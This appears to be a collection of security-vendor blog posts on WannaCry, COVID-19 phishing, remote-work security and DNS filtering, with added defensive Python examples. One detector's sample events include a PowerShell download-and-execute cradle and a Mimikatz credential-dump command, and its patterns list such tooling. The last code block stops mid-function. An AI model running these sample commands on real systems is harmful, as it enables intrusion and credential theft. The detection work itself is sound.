The flaw exploited by EternalBlue had been reported to Microsoft and a patch was issued in March 2017, two months before the attacks started. However, many businesses were slow to apply the patch and were vulnerable to attack. Within a matter of hours, around 200,000 computers had been attacked in 150 countries. It is worth noting here that there are still many computers that have not been patched more than 2 and a half years after the patch was released, in spite of widespread news coverage about the threat of attack and its huge cost. WannaCry is still one of the biggest ransomware threats and accounts for a significant percentage of all successful ransomware attacks in 2019.
WannaCry was blocked by a British security researcher who discovered the ransomware checked a domain name prior to encrypting data, but that domain name had not been registered. He purchased the domain name, thus preventing file encryption.
That said, the speed at which the ransomware spread meant many devices were infected and encrypted. Since businesses were not protected if the ransomware encryption had already started by the time the kill switch was activated, the attackers must have had a huge payday. So how much did WannaCry make?
By today’s standards, the ransom demand was very small: just $300 per infected device, which doubled to $600 if payment was not made within 3 days. It is actually easy to see how many payments were made, as the transactions are detailed in the blockchain. The recipient remains anonymous, but the payments can be seen.
The three Bitcoin addresses known to have been used in the WannaCry attacks currently show 430 payments have been made and 54.43228033 BTC has been sent to those accounts. The value of BTC is somewhat volatile and was much higher at points between the attacks and now, but at today’s exchange rate that equates to around $386,905. Most of the BTC payments have now been moved out of the accounts, so the attackers have managed to cash out. Payments are also still being made to those accounts. The latest payments to one of the addresses were made in December 2019.
$386,905 may not seem like much of a payday considering the number of devices infected and the damage caused by the attack, and it’s not. Further, the attackers will need to convert that total to real money, and a considerable amount will be lost in that process. The payday was tiny considering the scale of the attack. However, the cost of the attack to businesses was colossal.
The National Health Service in the United Kingdom was hit hard, and the cleanup operation, along with the loss of business while it took place, has been estimated to have cost £92 million. That was just one victim, albeit a major one. The total cost of the 2017 WannaCry ransomware attacks has been estimated at $4 billion globally. Even though the kill switch was flicked to block the initial attacks, the threat from WannaCry has not gone away. In 2019, two years after the initial attacks, millions of computers were still at risk, as the vulnerability that was exploited had still not been fixed, and a new version of WannaCry had been released without the kill switch, which continues to pose a threat. In 2019 Kaspersky said it was the most detected ransomware threat, with the ransomware infecting 164,433 users and accounting for 21 percent of detected ransomware attacks that year, and ESET reported that WannaCry was the most commonly detected ransomware threat in Q1, 2020, 3 years after the ransomware first appeared. The ransomware is still being used in attacks on unpatched systems in Thailand, Turkey, and Indonesia.
Next time you delay applying a patch or updating software, consider WannaCry and the potential costs of exploitation of a vulnerability. In all of the above cases – all 200,000+ attacks – applying the patch would have prevented the attack and the huge cost of remediation.
TitanHQ is pleased to announce the UK-based mid-market private equity firm Livingbridge has invested in TitanHQ through its Enterprise 3 fund.
Livingbridge invests in fast growing companies valued up to 200 million. The Enterprise 3 fund is used to invest in companies with an enterprise value of up to £50 million. Livingbridge identified TitanHQ as an ideal company for investment, being uniquely positioned with a well-differentiated product portfolio, operating in an attractive market with strong macro tailwinds, and being a leader in the sector with a proven track record for delivering robust, easy to use, effective, and much loved security solutions.
TitanHQ has been operating for 20 years during which time the company has collected many awards for its email security, web filtering, and email archiving SaaS solutions – SpamTitan, WebTitan, and ArcTitan.
More than 8,500 businesses have chosen TitanHQ as a security partner and the company is hugely popular with managed service providers, with SpamTitan, WebTitan, and ArcTitan offered by more than 2,500 channel partners. SMBs, MSPs, and ISPs in more than 150 countries use TitanHQ solutions, including big name brands such as Pepsi, Virgin, O2, ViaSat, and Datto. The company has registered year on year growth and now has an ARR of more than $15 million.
“We are delighted to be partnering with TitanHQ,” said Livingbridge director, Nick Holder. “There is a tremendous opportunity for Titan HQ to accelerate its growth trajectory over the coming years and we look forward to working closely with the management team to fulfill the company’s potential. Their focus and dedication to the MSP community is completely aligned with our strategy.”
The partnership will help TitanHQ reach its full potential and further cement its position as the leading provider of cloud-based security solutions to MSPs serving the SMB market.
“We are excited to be taking this next step in our growth journey with Livingbridge, a partner that understands the unique strengths of our business, shares our vision for success and has the experience and resources to help us to achieve it,” said TitanHQ CEO, Ronan Kavanagh.
The global COVID-19 pandemic has forced businesses to make massive changes in a short period of time. Many managed service providers have demonstrated resilience and have weathered the storm and have shown that while we are now living in very uncertain times, there are opportunities for growth. Successful MSPs have not only adapted their business to ensure their survival, they have seized the opportunities and are gaining considerable growth momentum and have shown it is possible to thrive in spite of an extremely challenging economy.
At MVP GrowthFest on June 23, 2020 you will be able to find out how successful MSPs are turning adversity into growth and profit and will learn from an all-star line up of Channel experts about the state of the Channel and what you must do to adapt to these challenging times. You will also be provided with guidance on the steps you can take now to ensure success and grow your business and thrive.
MVP GrowthFest is a 3-hour virtual event that will provide valuable insights and advice that can be used immediately to help you grow your business. The event is being headlined by an interview with Earvin “Magic” Johnson Jr., the 3-time NBA MVP Award winner.
Matt Solomon, VP of Business Development at ID Agent, will be conducting the interview with Magic Johnson, who will explain how he succeeded by overcoming obstacles throughout his life, and how tenacity and commitment to the community were key to his success.
MVP GrowthFest will be celebrating the energy that powers growth and the drive to thrive during challenging times and, in addition to the interview, MSPs will hear from 15 Channel all-stars in four powerhouse panels.
TitanHQ is pleased to announce that Sales Director Conor Madden will be leading the panel in the security session titled “Leading with Security through Education.” The key to selling products in your security stack is to educate your clients about the need for cybersecurity. Given the fact that cyber actors have been attacking businesses with increased vigor during the pandemic, positioning your security stack front and central is the logical step.
TitanHQ can offer web and email security solutions that will not only protect you and your clients, they can be efficiently implemented into your security stack and can be easily packaged. Plus, an extremely competitive price point means they are affordable solutions for your clients and generous margins will help you boost your bottom line.
Conor will be joined on the security powerhouse by:
Jon Murchison – CEO, BlackPoint Cyber
Kevin Lancaster – CEO, ID Agent & GM Security, Kaseya
Jessvin Thomas – President & CTO, SKOUT
Attendees will also get to hear from Channel leaders in three further Powerhouse sessions that will provide invaluable advice on how to grow your business and boost profits during these challenging times.
Managing Through Change
Dan Wensley – CEO, Warranty Master
Joe Alapat – CEO & Founder, Liongard
Ryan Walsh – Chief Channel Officer, Pax8
Establishing Trust in the New Normal
Dave Goldie – Vice President of Channel, Cytracom
Ted Roller – Channel Chief, ConnectBooster
Andra Hedden – CMO, Marketopia
Frank DeBenedetto – Founder, AudIT
Leading & Accelerating through the Recovery
Tim Conkle – Founder, The 20
Dennis O’Connell – Vice President, Taylor Business Group
If you have been following the security news, you will have seen that there has been a major increase in COVID-19 themed cyberattacks targeting remote workers. Cybercriminals are exploiting fear about the virus and the somewhat chaotic switch from mostly office-based workers to having virtually the entire workforce working remotely. Understandably given the speed at which businesses have had to adjust, vulnerabilities have been introduced.
The attack surface has increased considerably as a result of largely at-home workforces and cybercriminals have taken advantage. According to research conducted by Darktrace, in the United Kingdom, prior to the COVID-19 lockdown being imposed, around 12% of malicious email traffic was targeting home workers. The volume increased to around 60% after 6 weeks of lockdown, which clearly demonstrates the extent to which remote workers are being targeted.
The types of malicious emails being sent to remote workers have been incredibly diverse. Cybercriminals are using all manner of lures to get remote workers to click links and disclose their credentials or open malicious attachments and trigger malware downloads. Financial fraud has also increased with BEC gangs using the COVID-19 pandemic to fraudulently obtain funds from company accounts.
Early on in the pandemic when information about the virus was thin on the ground, emails were being sent offering important advice about preventing infection along with fake updates on cases. As the pandemic progressed and the effects started to be felt, cybercriminals started sending fake requests for donations to charities to help individuals adversely affected by COVID-19. As governments implemented furlough schemes and set up funds to help the employed and self-employed, campaigns were conducted that linked to websites that claimed to offer grants, allow workers to choose to be furloughed, or apply for financial support.
Attacks have targeted the tools that are being used by remote workers to connect to their offices and communicate with colleagues, with the likes of Zoom, Skype, GoToMeeting, and other corporate messaging systems being spoofed to infect users with malware. File sharing platforms have similarly been spoofed to get employees to disclose their credentials. Darktrace’s data shows there has been a massive increase in spoofing attacks during lockdown, increasing from around one fifth of attacks before lockdown to 60%.
It is not only cybercrime groups that are conducting attacks. State-sponsored hacking groups have similarly been taking advantage of the pandemic to steal sensitive data, including the latest COVID-19 research data on potential cures, vaccines, and treatments to further the response efforts in their own countries.
What is not always clear from the news reports is how the increase in cyberattacks targeting remote workers has translated into actual data breaches. Are these attacks succeeding, or are companies managing to thwart the attacks and keep the hackers at bay?
There is a lag between intrusions being detected, breaches being confirmed, and announcements being made but it appears that many of these attacks are succeeding. In April, the International Association of IT Asset Managers issued a warning that while a rise in data breaches was to be expected as a result of the pandemic, the number of incidents was actually far higher than anticipated. It is also clear that ransomware attackers have stepped up their efforts to attack businesses. Even organizations on the frontline in the fight against COVID-19 have not been spared.
Threat actors have taken advantage of the opportunities offered by the pandemic. It is up to businesses to make sure their security measures are sufficient to thwart attacks. Combating cyberattacks on remote workers requires additional security measures to be implemented. One measure that is often overlooked but can greatly improve protection is DNS filtering.
A DNS filter provides protection against the web-based component of cyberattacks and is an important measure to implement to improve defenses against phishing and malware. Even with robust email security defenses in place, some messages will arrive in inboxes. A DNS filter provides an extra layer of protection by preventing users from visiting malicious websites linked in emails.
When a malicious link is clicked, a DNS query is made and a DNS lookup is performed to find the IP address of the domain in the URL. DNS filtering ensures that the IP address is not returned if the URL’s domain is malicious. A DNS filter such as WebTitan also allows IT teams to block malware downloads, monitor internet activity, and carefully control the types of websites their remote users can access on corporate devices.
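To make the lookup step above concrete, here is a small model of a filtering resolver, added as an example and not code from WebTitan or TitanHQ. The upstream answers, the threat-feed entries and the block page address are all constructed; it assumes a listed domain covers its subdomains and shows the caveat that a link to a bare IP address never triggers a DNS query at all.

```python
"""Model of the DNS-filtering decision described above (added example).

A resolver in front of the real DNS answers a query for a listed name with
the address of a local block page instead of the real address. All names,
addresses and categories below are constructed for the example.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed "upstream DNS" answers standing in for a real lookup.
UPSTREAM = {
    "intranet.example.com": "10.0.0.5",
    "docs.example.com": "10.0.0.6",
    "login-update.example.net": "203.0.113.10",
    "cdn.files-share.example.org": "203.0.113.20",
}

# Constructed threat feed: hostname or domain -> category. A listed domain
# covers all of its subdomains, so one entry handles a hosting domain that
# serves many throwaway phishing subdomains.
BLOCKLIST = {
    "login-update.example.net": "phishing",
    "files-share.example.org": "malware",
}

BLOCK_PAGE_IP = "10.0.0.250"          # constructed local block page address
BLOCKED_CATEGORIES = {"phishing", "malware"}


def hostname_from_url(url: str) -> str:
    """Extract and normalise the host a client would resolve for this link."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").rstrip(".").lower()   # drop FQDN dot, lowercase
    if not host:
        raise ValueError(f"no hostname in {url!r}")
    return host


def lookup_category(host: str):
    """Walk from the full hostname up through its parent domains.

    Returns (category, matched_name) or (None, None). The bare TLD is never
    checked, so a feed entry cannot accidentally block a whole TLD.
    """
    labels = host.split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in BLOCKLIST:
            return BLOCKLIST[candidate], candidate
    return None, None


def resolve(url: str) -> dict:
    """Return the DNS filter's answer for the link the user clicked."""
    host = hostname_from_url(url)
    try:
        ipaddress.ip_address(host)
        # A literal IP in the link means no DNS query is made, so a
        # DNS-only control has nothing to act on; other layers must cover it.
        return {"host": host, "answer": host, "blocked": False,
                "reason": "ip-literal, no DNS query performed"}
    except ValueError:
        pass
    category, matched = lookup_category(host)
    if category in BLOCKED_CATEGORIES:
        return {"host": host, "answer": BLOCK_PAGE_IP, "blocked": True,
                "reason": f"{matched} listed as {category}"}
    answer = UPSTREAM.get(host)       # pass the query through unchanged
    return {"host": host, "answer": answer, "blocked": False,
            "reason": "not listed" if answer else "NXDOMAIN"}


if __name__ == "__main__":
    for link in ("https://Login-Update.example.net/account/verify?id=123",
                 "http://cdn.files-share.example.org./invoice.doc",
                 "https://intranet.example.com/", "http://203.0.113.10/"):
        print(link, "->", resolve(link))
```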
If you have not yet implemented a DNS filtering solution and would like more information on how it can protect against cyberattacks on remote workers, give the TitanHQ team a call today.
Cybersecurity for remote workers has never been so important. At-home employees are being targeted by hackers who see them as low hanging fruit and an easy entry point into corporate networks.
The threat faced by businesses that have rapidly shifted to a largely at-home workforce should not be underestimated. With everyone working in the office, within the protection of the corporate firewall, IT departments could keep hackers at bay. Any employees that were authorized to work from home could be provided with a laptop that had security protections appropriate for the increased level of risk.
Moving the entire workforce from the office to attics, basements, kitchens, and spare rooms in a very short space of time has meant corners have had to be cut. Many SMBs have had to adapt quickly and have not had enough time to provide additional training to their at-home employees. The laptop computers now being used by their employees have had to be provisioned quickly and they lack the protection required for at home working. Some businesses are even allowing personal computers to be used out of necessity. Cybercriminals have been rubbing their hands with glee at the new opportunities and the ease at which they can attack businesses.
Lockdowns are now being lifted and people are being encouraged to go back to work, but further spikes in cases are likely as a result and with social distancing in the office problematic for many businesses, many employees will still need to work from home. To reduce the risk of those employees falling for a phishing scam or inadvertently downloading malware or ransomware, additional cybersecurity measures should be implemented.
You will more than likely have an email security solution to block the most common attack vector, but additional layers of security will greatly improve your security posture, one of the most important of which is a web filtering solution. A web filter stops your employees from visiting malicious websites, such as those used for phishing or malware distribution. When an attempt is made to visit a malicious website – through a link in a phishing email, a web redirect, or general web browsing – rather than being allowed to visit the website, employees will be directed to a local block page that explains the site cannot be accessed as it violates your internet usage policies.
A web filter can also be used to stop employees from using their work laptop for personal use by blocking websites by category, and as a control against shadow IT to prevent unauthorized software downloads.
WebTitan Cloud will allow you to improve cybersecurity for remote workers without requiring any software downloads and can be set up and protecting your office staff and remote workers in a matter of minutes.
Join us for our Webinar on Improving Cybersecurity for Remote Workers
If you are reading this before Thursday May 21, 2020, then you can find out more about how WebTitan Cloud can protect your employees and corporate network from attack by joining us for our webinar.
Title: Keeping your Remote Workers TWICE as secure with SpamTitan & WebTitan
Date: Thursday, May 21, 2020
Time: 11:00-11:30 CDT
If you missed the webinar, just give us a call and we will be happy to answer any questions you have, explain the benefits of WebTitan Cloud, arrange a product demonstration, and help get you filtering the internet and blocking web-based threats.
TitanHQ is hosting a webinar on Thursday May 21, 2020 and will be explaining how you can double protection for your remote workers and better protect them against phishing, malware, ransomware, and zero-day attacks. The webinar is ideal for current SpamTitan customers, prospective customers, Managed Service Providers and small- to medium-sized enterprises.
During the webinar you’ll find out why it is so important to protect against both the email- and web-based components of cyberattacks, and you will discover more about an important layer that you can add to your security defenses that will allow you to significantly reduce susceptibility to a cyber attack and data breach.
TitanHQ will explain how cybercriminals are exploiting the COVID-19 pandemic and are targeting remote workers. You will also discover more about the features and security layers of WebTitan Security and how this DNS-based web filtering solution allows you to manage user security at multiple locations.
Most cyberattacks have an email and web-based component – Find out how WebTitan serves as a vital layer of security to block phishing attacks, malware and ransomware downloads.
Learn why WebTitan is the leading web security option for Managed Service Providers who serve the SMB and SME market.
Join TitanHQ for the webinar, which will be attended by:
Derek Higgins, Engineering Manager TitanHQ
Eddie Monaghan, Channel Manager TitanHQ
Marc Ludden, Strategic Alliance Manager TitanHQ
Kevin Hall, Senior Systems Engineer at Datapac
Title: Keeping your Remote Workers TWICE as secure with SpamTitan & WebTitan
The 2019 Novel Coronavirus pandemic has caused major disruption for many businesses. While it is far from business as usual for many firms, work has been continuing by letting employees work from home, but doing so opens a business up to new cybersecurity risks, some of the most important of which we have covered in our COVID-19 cybersecurity checklist.
Under normal circumstances, the risks from allowing workers to spend some of their working week at home can be effectively managed, but having virtually the entire workforce working remotely creates many cybersecurity challenges. Further, threat actors are exploiting the pandemic and are actively targeting remote workers.
COVID-19 Cybersecurity Checklist
To help you address the risks of remote working we have produced a quick reference COVID-19 cybersecurity checklist covering some of the most important aspects of cybersecurity that should be addressed, in light of the recent rise in cyberattacks on remote workers.
All remote employees should be using VPNs to access corporate systems, but VPNs can also introduce vulnerabilities. There has been an increase in attacks exploiting unpatched vulnerabilities in VPNs during the pandemic and scans are being performed to find vulnerable VPNs.
VPN clients and VPN appliances must be kept up to date and patches should be applied promptly. Several attacks have recently been reported that exploited the Pulse Secure vulnerability CVE-2019-11510 to deliver ransomware, even though a patch was released to correct the flaw in April last year. That flaw lets an unauthenticated attacker read arbitrary files from the appliance, including cached credentials, which is why unpatched devices are such an attractive entry point. Vulnerabilities in other VPNs have also been targeted.
You should also consider disabling split tunneling for VPN profiles so that employees cannot access the internet directly while connected to corporate information systems, or otherwise ensure all internet traffic is routed through the VPN. Enable multi-factor authentication for VPN logins, place VPN users in a separate zone on your firewall, and apply security policies to that zone for both incoming and outgoing traffic.
Remote Desktop Protocol
Many businesses rely on Remote Desktop Protocol (RDP) to allow their employees to connect remotely. If you do not use RDP, disable Remote Desktop and block inbound TCP port 3389 at the firewall. Brute force attacks on RDP have been growing rapidly: a recent Kaspersky report showed a major increase between January and February, with global attacks rising to 93,102,836, and by April attacks had increased to a staggering 326,896,999.
If you use RDP, make sure strong passwords are set, enable multi-factor authentication and Network Level Authentication, and ensure connections are only possible through your VPN. Do not expose RDP directly to the internet.
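The brute force activity described above shows up in the Windows Security log as bursts of Event ID 4625 (failed logon) with LogonType 10 (RemoteInteractive, i.e. RDP) from one source address, often cycling through several account names, and the worst case is a 4624 success that follows the burst. The following detection rule is an added example, not TitanHQ code: the event IDs, logon type and field names are the real Windows ones, but the event records and IP addresses are constructed sample data.

```python
"""Detect RDP brute-force activity from Windows Security log events.

Added example, not TitanHQ code. Event IDs 4625 (failed logon), 4624 (successful
logon) and LogonType 10 (RemoteInteractive, i.e. RDP) are the real Windows values;
the event records below are constructed sample data, not a real log.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (a subset of the Security log fields).
SAMPLE_EVENTS = [
    # Attacker: rapid failures against several accounts, then a success.
    {"time": "2020-04-10T08:00:01", "id": 4625, "logon_type": 10, "user": "administrator", "src": "198.51.100.23"},
    {"time": "2020-04-10T08:00:04", "id": 4625, "logon_type": 10, "user": "administrator", "src": "198.51.100.23"},
    {"time": "2020-04-10T08:00:09", "id": 4625, "logon_type": 10, "user": "admin", "src": "198.51.100.23"},
    {"time": "2020-04-10T08:00:15", "id": 4625, "logon_type": 10, "user": "admin", "src": "198.51.100.23"},
    {"time": "2020-04-10T08:00:22", "id": 4625, "logon_type": 10, "user": "backup", "src": "198.51.100.23"},
    {"time": "2020-04-10T08:00:30", "id": 4625, "logon_type": 10, "user": "backup", "src": "198.51.100.23"},
    {"time": "2020-04-10T08:01:02", "id": 4624, "logon_type": 10, "user": "backup", "src": "198.51.100.23"},
    # Legitimate user: one typo, then a successful logon.
    {"time": "2020-04-10T08:05:00", "id": 4625, "logon_type": 10, "user": "jsmith", "src": "203.0.113.9"},
    {"time": "2020-04-10T08:05:20", "id": 4624, "logon_type": 10, "user": "jsmith", "src": "203.0.113.9"},
    # A network logon failure (type 3) is not RDP and is ignored by this rule.
    {"time": "2020-04-10T08:06:00", "id": 4625, "logon_type": 3, "user": "svc-backup", "src": "203.0.113.9"},
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: summary} for sources with >= threshold failed RDP logons
    inside any sliding `window`. The summary records the peak failure count, how many
    distinct accounts were tried (a password-spraying indicator) and whether a
    successful RDP logon from that source followed the burst (likely compromise)."""
    events = sorted(events, key=lambda e: datetime.fromisoformat(e["time"]))
    failures = defaultdict(deque)  # src -> timestamps of recent failed logons
    users = defaultdict(set)       # src -> account names tried
    flagged = {}
    for e in events:
        if e.get("logon_type") != 10:
            continue
        ts, src = datetime.fromisoformat(e["time"]), e["src"]
        if e["id"] == 4625:
            recent = failures[src]
            recent.append(ts)
            while ts - recent[0] > window:  # drop failures older than the window
                recent.popleft()
            users[src].add(e["user"])
            if len(recent) >= threshold:
                summary = flagged.setdefault(
                    src, {"failures": 0, "distinct_users": 0, "success_after": False})
                summary["failures"] = max(summary["failures"], len(recent))
                summary["distinct_users"] = len(users[src])
        elif e["id"] == 4624 and src in flagged:
            flagged[src]["success_after"] = True
    return flagged


if __name__ == "__main__":
    for src, summary in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(src, summary)
```

On the sample data only 198.51.100.23 is flagged: six failures in under a minute across three accounts, followed by a successful logon as "backup", which is the case that warrants killing the session and resetting that account immediately rather than just blocking the address. The threshold and window are tuning knobs; a single source trying many different usernames is worth alerting on even at lower counts.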
Communication and Collaboration Platforms
You will need to use some form of communication and collaboration platform, such as a videoconferencing solution, to allow workers to easily get in touch with colleagues. There are many choices available, but the security capabilities of each can vary considerably. Some solutions that were considered to be secure, such as Zoom, have been shown to have vulnerabilities, some of which have been exploited in attacks. The U.S. National Security Agency (NSA) has recently issued a useful checklist for selecting appropriate communication tools along with information on how they can be used securely.
With everyone at home, burglaries may be down and lockdowns have reduced the risk of loss and theft of mobile devices, but encryption is still important. All corporate-owned mobile computing devices should have full-disk encryption enabled, which is straightforward for Windows devices by enabling BitLocker. You should also make sure data in transit is encrypted: serve web applications over HTTPS and replace plain FTP with SFTP or FTPS so that anything uploaded or downloaded is protected.
Ensure Firewalls are Enabled
Your employees will be beyond the protection of the corporate firewall so they should have local firewalls enabled. The easiest and most cost-effective way of applying a local firewall is to use the Windows Defender firewall, which can be configured through your MDM solution or Group Policy.
The volume of phishing emails may not have increased by a very large degree during the COVID-19 lockdown, but there have been a large number of phishing related data breaches. Phishers have changed their campaigns and are now extensively using COVID-19 themed campaigns, which are proving to be very effective. People crave information about COVID-19 and are responding to COVID-19 themed phishing emails in large numbers. Many of the emails we have seen have been highly convincing, spoofing authorities such as WHO and the CDC.
You should consider adding an additional layer to your email defenses if you are only using Microsoft’s Exchange Online Protection (EOP). Many phishing emails are bypassing Microsoft’s defenses and are being delivered to inboxes. SpamTitan can be layered on top of Office 365 protections and will greatly improve the detection of phishing emails and zero-day malware and ransomware threats.
Multi-factor authentication for email accounts should be set up. In the event that email credentials are compromised, multi-factor authentication should prevent those credentials from being used to access accounts.
You should also set up a system that allows employees to report any suspicious emails they receive to the security team, to allow action to be taken to remove all similar messages from the email system and to tweak email security controls to block the threats.
With email security improved, you should also take steps to block web-based attacks. Malicious websites can be reached by employees through general web browsing, redirects via malvertising, malicious links on social media networks, and links in phishing emails. A DNS filtering solution such as WebTitan Cloud prevents employees from visiting known malicious websites and will block drive-by malware downloads. WebTitan Cloud will protect employees whether they are on or off the network. If you don't have web filtering capabilities for remote workers, ensure that internet access is only possible through your VPN so that all web traffic passes through the corporate firewall and filtering controls.
Cybersecurity Alerts and Log Checking
You should have systems in place that generate cybersecurity alerts automatically, and you should enable security logging and regularly check the logs for signs of compromise. Monitor the use of PowerShell and red team tools such as Mimikatz and Cobalt Strike; these tools are routinely used by human-operated ransomware groups to harvest credentials and move laterally once access to a network has been gained. On Windows that means enabling process creation auditing with command-line logging (Event ID 4688) and PowerShell script block logging (Event ID 4104), because the indicators usually sit in the command line or the script rather than in the file name.
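To show what "monitor the use of PowerShell and red team tools" looks like in practice, here is an added example (not TitanHQ code) that scans the command line recorded in Windows Event ID 4688 process creation events. It decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text) before matching, since that is where attackers hide download cradles. The host names and events are constructed sample data, and the indicator patterns are well-known public ones (Mimikatz module names, download cradles, PowerShell evasion switches) rather than a complete signature set.

```python
"""Flag suspicious PowerShell / credential-theft tooling in process creation events.

Added example, not TitanHQ code. It inspects the command line recorded in Windows
Security Event ID 4688 (with command-line auditing enabled). The events and host
names below are constructed sample data; the patterns are public, well-known
indicators and are a starting point, not a complete signature set.
"""
import base64
import re

INDICATORS = {
    "mimikatz": re.compile(r"Invoke-Mimikatz|sekurlsa::|lsadump::|privilege::debug", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I),
    "evasion_flags": re.compile(
        r"-nop\b|-noni\b|-w(?:indowstyle)?\s+hidden|-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "in_memory_load": re.compile(
        r"FromBase64String|VirtualAlloc|\[Reflection\.Assembly\]::Load", re.I),
}
# PowerShell accepts -e, -ec, -enc and -EncodedCommand followed by base64 text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Return the sorted list of indicator names triggered by one 4688 command line."""
    hits = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded_command")
    for text in (cmdline, decoded or ""):  # match on the raw and the decoded form
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    return sorted(hits)


def scan_events(events):
    """Return [(host, command_line, indicators)] for events that trigger an indicator."""
    findings = []
    for ev in events:
        hits = analyze_command_line(ev["cmdline"])
        if hits:
            findings.append((ev["host"], ev["cmdline"], hits))
    return findings


def _encode_ps(script):
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample 4688 events (host names and addresses are made up).
SAMPLE_EVENTS = [
    {"host": "LAPTOP-17", "cmdline": "powershell.exe -nop -w hidden -enc "
     + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"host": "LAPTOP-17", "cmdline": "powershell.exe -ExecutionPolicy Bypass -Command "
     "\"Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'\""},
    {"host": "LAPTOP-22", "cmdline": 'powershell.exe -Command "Get-Service -Name Spooler"'},
    {"host": "LAPTOP-22", "cmdline": "cmd.exe /c whoami /groups"},
]

if __name__ == "__main__":
    for host, cmdline, hits in scan_events(SAMPLE_EVENTS):
        print(host, hits, cmdline[:60])
```

The two LAPTOP-17 events are flagged (an encoded download cradle with hidden-window and no-profile switches, and a Mimikatz credential dump run with the execution policy bypassed), while the routine service query and the cmd.exe invocation are not. Treat this as one signal among several: a hit on a single host is an investigation trigger, and the absence of hits proves nothing, since tooling can be renamed and run without PowerShell at all.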
The COVID-19 pandemic has given cybercriminals a golden opportunity to make money. With the world focused on little else other than the response to the pandemic, and with people craving information about the virus, it is not surprising that standard phishing lures have been abandoned in favor of COVID-19 themed lures.
COVID-19 and coronavirus themed domains have been purchased in the tens of thousands and are being used for phishing, malware distribution, and a variety of scams such as obtaining donations to fake charities. Figures released by the Palo Alto Networks Unit 42 team for the period of February to March show there has been an average daily increase of new COVID-19 related domains of 656%, a 569% increase in the number of malicious COVID-19 domains, and a 788% increase in new high-risk domains.
Several domain registrars have started taking steps to combat coronavirus and COVID-19 related fraud and some, such as Namecheap, are now preventing the registration of new domains related to COVID-19. Domain registrars are flagging these new domains for investigation, but that is a manual review process that takes time. In the meantime, the domains are being set up and used for convincing scams.
One malicious campaign uncovered in the past few days uses COVID-19 themed domains to distribute the banking Trojan Grandoreiro. The websites host videos that promise important information about SARS-CoV-2 and COVID-19. When visitors click on the video, a file download is triggered and the user is told to run the installer to view the video content; the installer instead installs the banking Trojan. The Trojan has previously been delivered via spam email, but the threat group behind the malware has changed tactics in response to the pandemic and switched to web-based delivery.
There have been many similar campaigns created using malicious COVID-19 domains to deliver a slew of malware variants such as keyloggers, information stealers, cryptocurrency miners, and other Trojans.
Lockdown has left people with a lot of time on their hands and outdoor activities have been swapped for more TV time. It is no surprise that movie piracy sites have seen a huge surge in traffic and malware distributors are taking advantage and are bundling malware with pirated video files and using fake movie torrents to deliver malware.
An investigation by Microsoft identified a campaign that uses a VBScript packaged into ZIP files that claim to be pirated movie files. The campaign delivers a coinminer that runs in memory, with living-off-the-land binaries also used to download further malicious payloads.
These campaigns often have a phishing component, with emails sent to drive traffic to these malicious websites. An advanced spam filtering solution can help to block the email component of these campaigns, but businesses should also consider an additional layer to their security defenses to block the web-based component of these attacks and prevent their remote employees from visiting malicious COVID-19 domains. That protection can be provided by a DNS filtering solution such as WebTitan Cloud.
WebTitan Cloud filters out malicious websites at the DNS lookup stage of a web access request. When a user attempts to visit a website, instead of the standard DNS lookup to find the IP address of a website, the request is sent through WebTitan. If an attempt is made to visit a malicious domain, the request will be blocked and the user will be directed to a local block page. WebTitan can also be configured to block certain file downloads and filter the internet by category, such as blocking P2P file-sharing and torrents sites to provide additional protection against malware and the installation of shadow IT.
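The filtering decision described above happens before the lookup is answered: the filter normalizes the queried name, checks it and each of its parent domains against threat and category data, and either returns the real record or the address of the block page. The following is an added example of that decision logic, not WebTitan's code: the blocklist, category data, allowlist and block-page address are constructed, and a real service backs them with live threat intelligence feeds rather than dictionaries.

```python
"""A minimal DNS-layer filtering decision, the step a DNS filter performs before it
answers a lookup. Added example, not WebTitan code: the blocklist, category data,
allowlist and block-page address are constructed for the demonstration."""

BLOCK_PAGE_IP = "10.0.0.250"  # constructed: address of the local block page

# Constructed threat data: domain -> reason. A listed domain covers all its subdomains.
BLOCKLIST = {
    "covid19-relief-update.example": "malware",
    "login-secure-office365.example": "phishing",
}
# Constructed category data and the categories this tenant has chosen to block.
CATEGORIES = {"thepiratebay.example": "torrent", "news.example": "news"}
BLOCKED_CATEGORIES = {"torrent", "p2p"}
# Explicit exceptions; the most specific match wins.
ALLOWLIST = {"partner.covid19-relief-update.example"}


def normalize(qname):
    """Canonicalize a query name: case, trailing dot, and IDN labels to punycode."""
    name = qname.strip().rstrip(".").lower()
    return name.encode("idna").decode("ascii")


def candidates(name):
    """Yield the name and each parent domain, most specific first, stopping above the TLD."""
    labels = name.split(".")
    for i in range(len(labels) - 1):
        yield ".".join(labels[i:])


def decide(qname, blocklist=BLOCKLIST, categories=CATEGORIES,
           blocked_categories=BLOCKED_CATEGORIES, allowlist=ALLOWLIST):
    """Return (verdict, reason) where verdict is 'allow', 'block' or 'refuse'."""
    try:
        name = normalize(qname)
    except UnicodeError:  # empty or over-long label: malformed query
        return ("refuse", "invalid name")
    for cand in candidates(name):
        if cand in allowlist:
            return ("allow", "allowlist:" + cand)
        if cand in blocklist:
            return ("block", blocklist[cand] + ":" + cand)
        category = categories.get(cand)
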